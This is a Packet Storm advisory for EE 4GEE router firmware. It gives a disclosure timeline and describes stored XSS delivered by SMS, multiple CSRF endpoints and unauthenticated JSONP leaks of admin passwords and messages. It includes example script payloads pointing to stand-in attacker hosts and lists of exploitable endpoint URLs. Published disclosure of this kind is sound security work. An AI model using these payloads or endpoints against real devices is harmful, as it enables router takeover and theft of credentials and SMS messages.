EE 4GEE Wireless Router EE60_00_05.00_25 XSS / CSRF / Disclosure

2017-09-08T00:00:00
ID PACKETSTORM:144055
Type packetstorm
Reporter James Hemmings
Modified 2017-09-08T00:00:00

Description

                                        
                                            `EE 4GEE Wireless Router - Multiple Security Vulnerabilities Advisory  
-------------------------------------------------  
Hardware Version/Model: 4GEE WiFi MBB (EE60VB-2AE8G83).  
Vulnerable Software Version: EE60_00_05.00_25.  
Patched Software Version: EE60_00_05.00_31.  
Product URL:  
https://shop.ee.co.uk/dongles/pay-monthly-mobile-broadband/4gee-wifi/details  
  
Proof of Concept Writeup:  
https://blog.jameshemmings.co.uk/2017/08/24/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities-writeup/#more-276  
  
Disclosure Timeline:  
27th July, 2017 at 21:32 GMT. Email sent with technical vulnerability  
information and PoC.  
27th July, 2017 at 22:00 GMT. Response from EE devices manager,  
confirming receipt of PoC.  
31th July, 2017 at 18:47 GMT. Update from vendor, patches being  
developed for reported issues.  
1st August, 2017 at 10:43 GMT. Reply sent to vendor.  
10th August, 2017 at 10:32 GMT. Update from vendor, patches still being  
developed.  
18th August, 2017 at 12:11 GMT. Email sent to vendor asking for update/ETA.  
18th August, 2017 at 12:15 GMT. Response from vendor, updates to be  
released on Monday.  
18th August, 2017 at 12:30 GMT. Reply sent to vendor with device IMEI  
for online update process.  
22nd August, 2017 at 15:54 GMT. Response from vendor, beta firmware  
released to verify changes.  
23rd August, 2017 at 21:29 GMT. Reply sent to vendor, vulnerabilities  
successfully patched.  
24th August, 2017 at 09:32 GMT. Response from vendor, patch publicly  
released to customers.  
24th August, 2017 at 12:00 GMT. Full disclosure via Blog.  
  
-------------------------------------------------  
Stored Cross Site Scripting (XSS) - SMS Messages:  
-------------------------------------------------  
Attack Type: Remote  
Impact: Code Execution  
Affected Components:  
http://ee.mobilebroadband/default.html#sms/smsList.html?list=inbox  
http://ee.mobilebroadband/getSMSlist?rand=0.19598614685224347  
  
Attack Vectors: An attacker can exploit the vulnerability by sending a  
remote SMS message to the device with an XSS payload such as "<script  
src=http://payload.js</script>" which is executed upon the user viewing  
the SMS message within the admin panel "SMS Inbox" functionality.  
Additionally, self-XSS can be achieved by creating an XSS payload from  
the device its self within a text message, which could be chained with  
other vulnerabilities such as CSRF.  
  
Vulnerability Description:The 4GEE Mobile WiFi Router is vulnerable to  
Stored Cross Site Scripting (XSS) within the "sms_content" parameter  
returned to the application's SMS Inbox webpage by the "getSMSlist" POST  
request, due to a lack of input validation and/or encoding. This exploit  
can be triggered by remotely sending an SMS message containing any XSS  
payload such as '"><script src=http://attacker.tld/r.js></script>' which  
upon clicking on the text message within the web application is  
successfully executed.  
  
Additionally, due to the other vulnerabilities identified within this  
device, such vulnerability can be chained with Cross Site Request  
Forgery (CSRF) using the Stored XSS payload to send an JavaScript XHR  
POST request to the "uploadSettings" web-page containing binary  
configuration data, allowing for total modification of device settings  
by an attacker.  
  
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N/E:H/RL:O/RC:C (CVSS V3: 7.1  
- High).  
  
Author: James Hemmings - security@jameshemmings.co.uk  
Reference(s):  
[1]  
https://blog.jameshemmings.co.uk/2017/08/21/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities  
  
-------------------------------------------------  
Cross Site Request Forgery (CSRF) - Multiple:  
-------------------------------------------------  
Attack Type: Remote  
Impact: Code Execution  
Affected Components:  
http://192.168.1.1/goform/AddNewProfile?rand=0.376065695742409  
http://192.168.1.1/goform/setWanDisconnect?rand=0.6988130822240772  
http://192.168.1.1/goform/setSMSAutoRedirectSetting?rand=0.9003361879232169  
http://192.168.1.1/goform/setReset?rand=0.021764703082234105  
http://192.168.1.1/goform/uploadBackupSettings  
  
Attack Vectors: An attacker could attempt to trick users into accessing  
malicious CSRF payload URLs, which would allow an attacker to execute  
privileged functions such as device reset, device reboot, internet  
connection and disconnection, SMS message redirection and binary  
configuration file upload, which would allow modification of all device  
settings. Addtionally, this exploit can be chained together using other  
vulnerabilities discovered to be remotely exploitable over SMS, using  
Stored Cross Site Scripting (XSS).  
  
Vulnerability Description: The 4GEE Mobile WiFi Router is vulnerable to  
multiple Cross Site Request Forgery (CSRF) vulnerabilities within  
various router administration web-pages, due to the lack of robust  
request verification tokens within requests. An attacker could persuade  
an authenticated user to visit a malicious website using phishing and/or  
social engineering techniques to send an CSRF request to the web  
application, thus executing the privileged function as the authenticated  
user. In this case, due to the lack of authentication on certain  
privileged functions, authentication may not be necessary.  
  
The following web-pages were identified to be vulnerable to Cross Site  
Request Forgery (CSRF) attacks:  
  
AddNewProfile [2].  
setWanDisconnect [3].  
setSMSAutoRedirectSetting [4].  
setReset [5].  
uploadBackupSettings [6].  
  
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N/E:H/RL:O/RC:C (CVSS V3: 6.8  
- Medium).  
  
Author: James Hemmings - security@jameshemmings.co.uk  
Reference(s):  
[1]  
https://blog.jameshemmings.co.uk/2017/08/21/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities  
  
[2]  
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/AddProfileCSRFXSSPoc.html  
  
[3]  
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/CSRFInternetDCPoC.html  
  
[4]  
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/CSRFPocRedirectSMS.html  
  
[5]  
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/CSRF/CSRFPocResetDefaults.html  
  
[6]  
https://github.com/JamesIT/vuln-advisories-/blob/master/EE-4GEE-Multiple-Vulns/uploadBinarySettingsCSRFPoC.html  
  
  
-------------------------------------------------  
JSONP Sensitive Information Disclosure - Multiple  
-------------------------------------------------  
Attack Type: Remote  
Impact: Information Disclosure  
Affected Components:  
http://192.168.1.1/goform/getPasswordSaveInfo  
http://192.168.1.1/goform/getSingleSMSReport?rand=0.133713371337  
http://192.168.1.1/goform/getSingleSMS?sms_id=1&rand=0.133713371337  
http://192.168.1.1/goform/getSMSStoreState  
http://192.168.1.1/goform/getSMSAutoRedirectSetting  
http://192.168.1.1/goform/getSysteminfo  
http://192.168.1.1/goform/getUsbIP?rand=0.13371337  
  
Attack Vectors: An attacker on the local network could escalate  
privileges from unauthenticated user, to authenticated administrative  
user by accessing the saved admin credentials within the JSONP endpoint.  
Additionally, an attacker could access network configuration data and  
SMS messages without authentication.  
  
Vulnerability Description: The 4GEE Mobile WiFi Router is vulnerable to  
multiple JSONP information disclosure vulnerabilities within various  
endpoints which retrieve and/or set data. The JSONP endpoints allow for  
unauthenticated information disclosure of sensitive configuration data,  
settings, administration passwords and SMS messages, due to the lack of  
robust and effective access control. An attacker could view such  
unauthenticated endpoints via the local WiFi network to gain access to  
the administration credentials, router configuration and/or SMS messages.  
  
CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:H/RL:O/RC:C (CVSS V3: 8.1  
- High).  
  
Author: James Hemmings - security@jameshemmings.co.uk  
Reference(s):  
[1]  
https://blog.jameshemmings.co.uk/2017/08/21/ee-4gee-mobile-wifi-router-multiple-security-vulnerabilities  
  
  
-------------------------------------------------  
Disclaimer  
-------------------------------------------------  
The information in the advisory is believed to be accurate at the time  
of publishing based on currently available information. Use of the  
information constitutes acceptance for use in an AS IS condition. There  
are no warranties with regard to this information. Neither the author  
nor the publisher accepts any liability for any direct, indirect, or  
consequential loss or damage arising from use of, or reliance on, this  
information.  
  
  
  
`